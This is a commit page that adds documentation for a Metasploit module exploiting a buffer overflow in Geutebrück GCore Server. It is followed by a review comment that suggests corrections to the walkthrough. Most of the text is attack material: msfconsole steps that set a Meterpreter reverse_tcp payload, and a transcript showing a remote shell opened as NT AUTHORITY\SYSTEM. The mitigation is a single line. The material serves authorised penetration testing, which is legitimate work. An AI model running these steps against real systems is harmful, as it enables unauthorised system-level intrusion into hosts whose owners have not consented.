
Commit 7705472

author: Maurice Popp (committed)
added documentation, and fixed 4 to 2 indentation
1 parent c187f70 commit 7705472

File tree

2 files changed: +318 -255 lines changed

Lines changed: 63 additions & 0 deletions
@@ -0,0 +1,63 @@
1+
## Vulnerable Application
2+
3+
Geutebrück GCore Server 1.3.8.42,1.4.2.37 are vulnerable to a buffer overflow exploitation. Since this application is started with system privileges this allows a system remote code execution.
4+
5+
## Verification Steps
6+
7+
1. Install Windows as basic OS (Tested with Win2012R2,Windows 7)
8+
2. Install the Geutebrück GCore server
9+
3. Verify that http://<your target ip>:13003/statistics/runningmoduleslist.xml available is.
10+
4. Start msfconsole
11+
5. Do: ```use [exploit/windows/http/geutebrueck_gcore_x64_rce_bo]```
12+
6. Do: ```set rhost <your target ip>```
13+
7. Do: ```set rport 13003``
14+
8. Do: ```set payload windows/x64/meterpreter/reverse_tcp```
15+
9. Do: ```exploit```
16+
10. You should get a shell as NT/SYSTEM.
17+
18+
## Scenarios
19+
```
20+
msf exploit(geutebrueck_gcore_x64_rce_bo) > show options
21+
22+
Module options (exploit/windows/http/geutebrueck_gcore_x64_rce_bo):
23+
24+
Name Current Setting Required Description
25+
---- --------------- -------- -----------
26+
RHOST 192.168.1.10 yes The target address
27+
RPORT 13003 yes The target port
28+
29+
30+
31+
Payload options (windows/x64/meterpreter/reverse_tcp):
32+
33+
Name Current Setting Required Description
34+
---- --------------- -------- -----------
35+
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
36+
LHOST 192.168.1.11 yes The listen address
37+
LPORT 4444 yes The listen port
38+
39+
40+
Exploit target:
41+
42+
Id Name
43+
-- ----
44+
0 Automatic Targeting
45+
46+
msf exploit(geutebrueck_gcore_x64_rce_bo) > exploit
47+
[*] Started reverse TCP handler on 192.168.1.11:4444
48+
[*] 192.168.1.10:13003 - Trying to fingerprint server with http://192.168.1.10:13003/statistics/runningmoduleslist.xml...
49+
[*] 192.168.1.10:13003 - Vulnerable version detected: GCore 1.4.2.37, Windows x64 (Win7, Win8/8.1, Win2012R2,...)
50+
[*] 192.168.1.10:13003 - Preparing ROP chain for target 1.4.2.37!
51+
[*] 192.168.1.10:13003 - Crafting Exploit...
52+
[*] 192.168.1.10:13003 - Exploit ready for sending...
53+
[*] 192.168.1.10:13003 - Exploit sent! [*] Sending stage (1188415 bytes) to
54+
[*] Meterpreter session 1 opened ( :4444 -> 49963) at 2017-11-03 13:14:51 +0200
55+
[*] 192.168.1.10:13003 - Closing socket.
56+
meterpreter > getsystem
57+
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
58+
meterpreter > getuid Server username:
59+
NT-AUTORITÄT\SYSTEM
60+
meterpreter >
61+
```
62+
## Mitigation
63+
Geutebrück released a new Version and an update for the affected version which should be installed to fix the described vulnerabilities.
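Review bot: step 5 of the Verification Steps wraps the module path in square brackets (```use [exploit/windows/http/geutebrueck_gcore_x64_rce_bo]```); typed as written, `use` will not find the module, so drop the brackets: ```use exploit/windows/http/geutebrueck_gcore_x64_rce_bo```. Step 7 closes its code span with two backticks against three opening ones (```set rport 13003``), which breaks rendering of that list item. Step 3 has German word order ("available is"); make it "Verify that http://<your target ip>:13003/statistics/runningmoduleslist.xml is available". The steps select a reverse_tcp payload but never `set lhost`, so a `set lhost <your attacker ip>` step would make the walkthrough self-contained, and step 10's "NT/SYSTEM" should read NT AUTHORITY\SYSTEM. In the Vulnerable Application paragraph, "1.3.8.42,1.4.2.37" needs a space or "and", and "allows a system remote code execution" is clearer as "allows remote code execution as SYSTEM". In the Scenarios transcript two output lines have been run together ("Exploit sent! [*] Sending stage (1188415 bytes) to" and "meterpreter > getuid Server username:"), and since the text states the service already runs as SYSTEM, the `getsystem` call adds nothing to the demonstration; `getuid` alone shows the privilege level. Finally, the Mitigation section says only that a new version was released; naming the fixed version(s) or linking the vendor advisory would let readers verify they are patched.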
